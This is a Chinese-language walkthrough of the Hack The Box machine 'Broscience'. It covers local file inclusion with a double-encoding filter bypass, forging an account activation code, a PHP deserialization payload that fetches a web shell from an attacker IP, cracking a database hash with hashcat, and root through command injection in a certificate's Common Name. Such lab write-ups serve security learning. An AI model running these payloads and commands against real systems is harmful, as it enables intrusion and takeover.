Broscience
一、常规端口扫描
开放三个端口
二、web渗透
-
打开80端口是一个带有登录功能的健身网页
-
目录扫描一波,发现了几个目录列表,有目录遍历漏洞
-
点击img.php,有个错误提示,说缺少path参数
-
拼接好参数尝试能否读取到系统文件,直接写…/…/…/…/…/etc/passwd会被拦截,有参数过滤,但是通过两次url编码可以绕过
-
把读取到的passwd下载到本地,发现这台机器有三个用户,分别是root,bill和postgres
-
由于img.php的path参数可以读取本地文件,那么就存在源码泄露漏洞,利用curl把includes目录的php文件全下载到本地,便于之后的分析需要
-
回到之前的网页,本来想着是自己注册一个账号登录,看看后台是否含有利用的点,但是注册完毕后还要点击验证链接,由于是靶场环境,只能自己尝试绕过
-
把注册页面的register.php下载下来分析一波源码
发现在注册用户的时候调用了utils.php并且发送激活链接调用了activate.php
那就再把activate.php下载下来分析,发现这个页面只能告诉我们验证码是个32位的字母和数字组合
在activate.php没得到更多有用的信息,但是之前分析register.php的时候发现还调用了utils.php,于是把之前下载的utils.php来拿出来分析一波,在阅读utils.php的时候,这个php文件的第一段代码就直接告诉我们了生成验证码的方法,利用注册时的系统时间来初始化随机数的种子值,从而生成一个32位字符的验证码,这个php源码还有一个可以利用的点,后面会说到
那我们就可以直接用他这个源码生成一个验证码
php中time函数生成的值如下格式,可以找到注册时间再利用https://www.epochconverter.com/这个网站来生成
新建一个yzm.php文件,内容如下,之后利用php -f yzm.php来生成激活码
<?php function generate_activation_code() { $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"; srand(1676033457); // 这里的值由上面网站生成 $activation_code = ""; for ($i = 0; $i < 32; $i++) { $activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)]; } return $activation_code; } echo generate_activation_code() ; ?>
-
打开f12,把请求内容复制下来,利用curl的-i参数来显示出cookie以及请求时间
curl -X POST -d 'username=asd&email=asd%40htb.com&password=asd&password-confirm=asd' https://broscience.htb/register.php -k -i
-
在利用curl拼接上cookie和上面生成的激活码来激活账号(这里图片跟上面不一致,是因为这个靶场会定期删除账号及上传内容)
curl -k -X POST -b 'PHPSESSID=q2aivm3nb6aid52je1c3c7kull' https://broscience.htb/activate.php?code=mokEoV8EyMTtc2ouUJfio6eXjyQPbNdL -i
-
利用激活的账号,登录到网站中,有个用户界面,在之前分析utils.php中发现这个php文件还负责生成用户cookie中的user-prefs,并且还具有一个可利用的反序列化漏洞。
在utils.php中avatar 类有两个参数,一个参数imgpath用于指向图像的路径,另一个tmp参数作用是保存img传来的内容。
在AvatarInterface中有一个__wakeup()魔法函数,用于创建 avatar 类的新实例和avatar类的类保存方法。
所以我们可以将 imgpath路径直接设置为我们反连shell的地址,tmp路径会将其保存在当前目录下,之后可以访问shell.php并且获得一个shell。
反序列化php内容如下,这里的用于获取shell的shell.php,我用的是kali自带的,用其他的也一样道理
<?php class Avatar { public $imgPath; public function __construct($imgPath) { $this->imgPath = $imgPath; } public function save($tmp) { $f = fopen($this->imgPath, "w"); fwrite($f, file_get_contents($tmp)); fclose($f); } } class AvatarInterface { public $tmp="http://10.10.14.25:80/shell.php"; public $imgPath="./shell.php"; public function __wakeup() { $a = new Avatar($this->imgPath); $a->save($this->tmp); } } $payload = base64_encode(serialize(new AvatarInterface)); echo $payload; ?>利用php -f payload.php运行输出,得到含有恶意代码的cookie,再把此cookie利用cookie editor插件写入页面同时利用python临时生成一个web服务器,之后刷新网页
-
访问https://broscience.htb/shell.php成功得到一个shell,找到一个立足点
但是这个shell的权限太低,需要提权才能读取到flag
三、提权至用户
-
在之前的过程中发现这台机器有个postgres用户,并且在泄露的源码中发现了db_connect.php(如下)直接暴露了数据库连接的账号密码等信息,于是想到连接postgresql看看能不能找到一些有用的账号密码
<?php $db_host = "localhost"; $db_port = "5432"; $db_name = "broscience"; $db_user = "dbuser"; $db_pass = "RangeOfMotion%777"; $db_salt = "NaCl"; $db_conn = pg_connect("host={$db_host} port={$db_port} dbname={$db_name} user={$db_user} password={$db_pass}"); if (!$db_conn) { die("<b>Error</b>: Unable to connect to database"); }这里我发现他在反弹回来的shell用psql连接时会一直卡住,但是用python生成一个交互式shell之后就没啥问题了
python3 -c "import pty;pty.spawn('/bin/bash')"psql -h localhost -p 5432 -U dbuser -d broscience
进入shell之后利用\dt查看一下有哪些表,这里注意到有个users表,一般情况下账号密码应该保存在这个表下,利用\copy (SELECT * FROM users) TO '/tmp/users.csv‘命令把users表转存在本地便于分析
查看users.csv,发现了几个用户名和密码,但是密码是加密的,由于这个机器涉及到的用户只有bill,那就利用hashcat直接针对bill的密码hash值进行破解,得到bill:iluvhorsesandgym
hashcat -m 20 bill.txt /usr/share/wordlists/rockyou.txt -
利用得到的账号密码进行ssh登录,成功获取user.txt的flag
四、提权至ROOT
-
拿到userflag之后又是一些常规的提权信息收集,在跑pspy脚本时发现有个计划任务再以root身份运行
-
切到/opt目录查看一下renew_cert.sh是做什么的,内容如下:
#!/bin/bash if [ "$#" -ne 1 ] || [ $1 == "-h" ] || [ $1 == "--help" ] || [ $1 == "help" ]; then echo "Usage: $0 certificate.crt"; exit 0; fi if [ -f $1 ]; then openssl x509 -in $1 -noout -checkend 86400 > /dev/null if [ $? -eq 0 ]; then echo "No need to renew yet."; exit 1; fi subject=$(openssl x509 -in $1 -noout -subject | cut -d "=" -f2-) country=$(echo $subject | grep -Eo 'C = .{2}') state=$(echo $subject | grep -Eo 'ST = .*,') locality=$(echo $subject | grep -Eo 'L = .*,') organization=$(echo $subject | grep -Eo 'O = .*,') organizationUnit=$(echo $subject | grep -Eo 'OU = .*,') commonName=$(echo $subject | grep -Eo 'CN = .*,?') emailAddress=$(openssl x509 -in $1 -noout -email) country=${country:4} state=$(echo ${state:5} | awk -F, '{print $1}') locality=$(echo ${locality:3} | awk -F, '{print $1}') organization=$(echo ${organization:4} | awk -F, '{print $1}') organizationUnit=$(echo ${organizationUnit:5} | awk -F, '{print $1}') commonName=$(echo ${commonName:5} | awk -F, '{print $1}') echo $subject; echo ""; echo "Country => $country"; echo "State => $state"; echo "Locality => $locality"; echo "Org Name => $organization"; echo "Org Unit => $organizationUnit"; echo "Common Name => $commonName"; echo "Email => $emailAddress"; echo -e "\nGenerating certificate..."; openssl req -x509 -sha256 -nodes -newkey rsa:4096 -keyout /tmp/temp.key -out /tmp/temp.crt -days 365 <<<"$country $state $locality $organization $organizationUnit $commonName $emailAddress " 2>/dev/null /bin/bash -c "mv /tmp/temp.crt /home/bill/Certs/$commonName.crt" else echo "File doesn't exist" exit 1; -
通过分析发现renew_cert.sh脚本主要是用来检查SSL证书是否过期的,但是他的倒数第四行却有个可控变量$commonName,我们可以利用openssl生成一个新证书,在填写Common Name这一栏时加入恶意代码,让它以root权限运行,从而获得root权限
openssl req -x509 -sha256 -nodes -newkey rsa:4096 -days 1 -keyout broscience.key -out broscience.crt
-
之后就等待脚本运行,利用/bin/bash -p成功获取具有root权限的shell并读取到到root.txt的flag
340
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
